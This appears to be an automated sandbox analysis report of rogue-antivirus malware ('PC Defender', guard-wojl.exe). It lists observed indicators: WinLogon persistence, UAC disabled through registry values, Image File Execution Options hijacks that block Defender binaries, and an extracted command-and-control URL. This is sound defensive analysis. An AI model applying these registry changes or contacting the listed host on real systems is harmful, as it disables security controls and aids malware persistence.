Resubmissions
20-08-2024 19:03
240820-xqj6raybkf 1020-08-2024 19:02
240820-xpw4xssbrj 320-08-2024 18:59
240820-xnkphayaqh 1020-08-2024 18:53
240820-xj2r8asakj 6Analysis
-
max time kernel
109s -
max time network
110s -
platform
windows11-21h2_x64 -
resource
win11-20240802-en -
resource tags
arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system -
submitted
20-08-2024 18:59
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://github.com/Endermanch/MalwareDatabase
Resource
win11-20240802-en
Errors
General
-
Target
https://github.com/Endermanch/MalwareDatabase
Malware Config
Extracted
http://93.115.82.248/?0=1&1=1&2=9&3=i&4=9200&5=1&6=1111&7=texyhekisb
Signatures
-
Modifies WinLogon for persistence 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe,\"C:\\Program Files (x86)\\Def Group\\PC Defender\\Antispyware.exe\"" MsiExec.exe Set value (str) \REGISTRY\USER\S-1-5-21-242286936-336880687-2152680090-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\guard-wojl.exe" guard-wojl.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" guard-wojl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" guard-wojl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" guard-wojl.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 62 5648 mshta.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 12 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe\Debugger = "svchost.exe" guard-wojl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe\Debugger = "svchost.exe" guard-wojl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe\Debugger = "svchost.exe" guard-wojl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe guard-wojl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe guard-wojl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe\Debugger = "svchost.exe" guard-wojl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe guard-wojl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe guard-wojl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe guard-wojl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger = "svchost.exe" guard-wojl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe\Debugger = "svchost.exe" guard-wojl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe guard-wojl.exe -
Executes dropped EXE 1 IoCs
pid Process 3624 guard-wojl.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" guard-wojl.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\W: msiexec.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 12 raw.githubusercontent.com 13 raw.githubusercontent.com 42 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 12 checkip.dyndns.org -
Drops file in System32 directory 3 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\services.msc guard-wojl.exe File opened for modification C:\Windows\SysWOW64\eventvwr.msc guard-wojl.exe File opened for modification C:\Windows\SysWOW64\diskmgmt.msc guard-wojl.exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files (x86)\Def Group\PC Defender\hook.dll msiexec.exe File created C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe msiexec.exe File created C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe msiexec.exe -
Drops file in Windows directory 16 IoCs
description ioc Process File created C:\Windows\Installer\e583a35.msi msiexec.exe File opened for modification C:\Windows\Installer\e583a35.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\Installer\SourceHash{FC2ABC8E-3715-4A32-B8B5-559380F45282} msiexec.exe File created C:\Windows\Installer\{FC2ABC8E-3715-4A32-B8B5-559380F45282}\_3F16219B047CF8432B7ADA.exe msiexec.exe File created C:\Windows\SystemTemp\~DF5AD045C28380A941.TMP msiexec.exe File created C:\Windows\Installer\{FC2ABC8E-3715-4A32-B8B5-559380F45282}\_966CD4ED37489844400D0C.exe msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\SystemTemp\~DFC2BAB02F6CB320EB.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI3AD2.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\SystemTemp\~DFA9048863089544AA.TMP msiexec.exe File opened for modification C:\Windows\Installer\{FC2ABC8E-3715-4A32-B8B5-559380F45282}\_966CD4ED37489844400D0C.exe msiexec.exe File opened for modification C:\Windows\Installer\{FC2ABC8E-3715-4A32-B8B5-559380F45282}\_3F16219B047CF8432B7ADA.exe msiexec.exe File created C:\Windows\Installer\e583a39.msi msiexec.exe File created C:\Windows\SystemTemp\~DF4BFAB8646DC9429D.TMP msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language [email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language [email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language guard-wojl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 00000000040000004fbc8ede2bb95e8f0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff0000000027010100000800004fbc8ede0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff0000000007000100006809004fbc8ede000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d4fbc8ede000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000004fbc8ede00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\officeclicktorun\Overrides OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\ExternalFeatureOverrides\officeclicktorun OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\27 msiexec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\TrustCenter\Experimentation OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script\Settings\JITDebug = "0" MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\Overrides OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages\en-US = "2" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\officeclicktorun\Overrides OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\officeclicktorun OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\all\Overrides OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script\Settings MsiExec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 msiexec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "64" LogonUI.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E msiexec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\ExternalFeatureOverrides\officeclicktorun OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages\en-US = "1" OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\Overrides OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages\en-US = "2" OfficeClickToRun.exe -
Modifies registry class 32 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\E8CBA2CF517323A48B5B5539084F2528 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\ProductName = "PC Defender" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\AuthorizedLUAApp = "0" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList msiexec.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList\Media msiexec.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\C73BCE36FA1AA0E45AB2649A3FA0D390 msiexec.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528 msiexec.exe Key created \REGISTRY\USER\S-1-5-21-242286936-336880687-2152680090-1000_Classes\Local Settings [email protected] Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\PackageCode = "18627594958587344B2B3984171915B1" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\Language = "1033" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\C73BCE36FA1AA0E45AB2649A3FA0D390\E8CBA2CF517323A48B5B5539084F2528 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\RarSFX0\\" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\RarSFX0\\" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528 msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\InstanceType = "0" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\DeploymentFlags = "3" msiexec.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList\Net msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList\PackageName = "PCDefenderSilentSetup.msi" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList\Media msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\Clients = 3a0000000000 msiexec.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\E8CBA2CF517323A48B5B5539084F2528 msiexec.exe Key created \REGISTRY\USER\S-1-5-21-242286936-336880687-2152680090-1000_Classes\Local Settings msedge.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\Version = "16777216" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList\Net msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\E8CBA2CF517323A48B5B5539084F2528\DefaultFeature msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\AdvertiseFlags = "388" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\C73BCE36FA1AA0E45AB2649A3FA0D390 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList\Media\1 = ";" msiexec.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528 msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\Assignment = "1" msiexec.exe -
NTFS ADS 4 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\PC Defender.zip:Zone.Identifier msedge.exe File opened for modification C:\Users\Admin\Downloads\PC Defender (1).zip:Zone.Identifier msedge.exe File opened for modification C:\Users\Admin\Downloads\Windows Accelerator Pro.zip:Zone.Identifier msedge.exe File created C:\Users\Admin\AppData\Roaming\guard-wojl.exe\:Zone.Identifier:$DATA [email protected] -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2120 msedge.exe 2120 msedge.exe 3552 msedge.exe 3552 msedge.exe 2264 msedge.exe 2264 msedge.exe 1324 identity_helper.exe 1324 identity_helper.exe 1284 msedge.exe 1284 msedge.exe 768 msedge.exe 768 msedge.exe 4452 msiexec.exe 4452 msiexec.exe 6136 msedge.exe 6136 msedge.exe 3624 guard-wojl.exe 3624 guard-wojl.exe 3624 guard-wojl.exe 3624 guard-wojl.exe 3624 guard-wojl.exe 3624 guard-wojl.exe 3624 guard-wojl.exe 3624 guard-wojl.exe 3624 guard-wojl.exe 3624 guard-wojl.exe 3624 guard-wojl.exe 3624 guard-wojl.exe 3624 guard-wojl.exe 3624 guard-wojl.exe 3624 guard-wojl.exe 3624 guard-wojl.exe 3624 guard-wojl.exe 3624 guard-wojl.exe 3624 guard-wojl.exe 3624 guard-wojl.exe 3624 guard-wojl.exe 3624 guard-wojl.exe 3624 guard-wojl.exe 3624 guard-wojl.exe 3624 guard-wojl.exe 3624 guard-wojl.exe 3624 guard-wojl.exe 3624 guard-wojl.exe 3624 guard-wojl.exe 3624 guard-wojl.exe 3624 guard-wojl.exe 3624 guard-wojl.exe 3624 guard-wojl.exe 3624 guard-wojl.exe 3624 guard-wojl.exe 3624 guard-wojl.exe 3624 guard-wojl.exe 3624 guard-wojl.exe 3624 guard-wojl.exe 3624 guard-wojl.exe 3624 guard-wojl.exe 3624 guard-wojl.exe 3624 guard-wojl.exe 3624 guard-wojl.exe 3624 guard-wojl.exe 3624 guard-wojl.exe 3624 guard-wojl.exe 3624 guard-wojl.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
pid Process 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
